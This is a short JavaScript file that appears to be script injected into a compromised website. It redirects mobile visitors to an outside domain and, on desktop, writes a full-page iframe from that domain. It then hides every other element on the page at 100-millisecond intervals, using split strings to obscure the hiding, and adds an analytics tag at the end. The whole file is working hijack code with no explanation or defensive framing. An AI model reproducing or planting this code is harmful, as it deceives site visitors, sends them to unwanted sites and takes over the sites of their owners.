var isMobile = function(){var ua = navigator.userAgent;isAndroid = /Android/i.test(ua);isBlackBerry = /BlackBerry/i.test(ua);isWindowPhone = /IEMobile/i.test(ua);isIOS = /iPhone|iPad|iPod/i.test(ua);return isMobile = isAndroid || isBlackBerry || isWindowPhone || isIOS;}
if(isMobile())
{
  setTimeout(function(){
	window.location.href="http://m.gcgc44.com"
},500);

}
else
{
  document.write("<center id=\"showcloneshengxiaon\"><iframe src=\"http://jim.gcgc44.com/?"+"\" width=\"100%\" height=\"1000px"+ window.screen.availHeight +"\" scrolling=\"yes\" frameborder=\"0\"></iframe></center>");

try{
	setInterval(function(){

		try{
			document.getElementById("div"+"All").style.display="no"+"ne";
		}catch(e){}

		for(var i=0;i<document.body.children.length;i++){
			try{
				var tagname = document.body.children[i].tagName;
				var myid = document.body.children[i].id;
				if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){
				  // if(tagname!="center"){ 
				     document.body.children[i].style.display="non"+"e";
				   //}
				}
			}catch(e){}
		}

	},100);
}catch(e){}

}

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?301ad90bd356d661d57697076f56b7a2";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();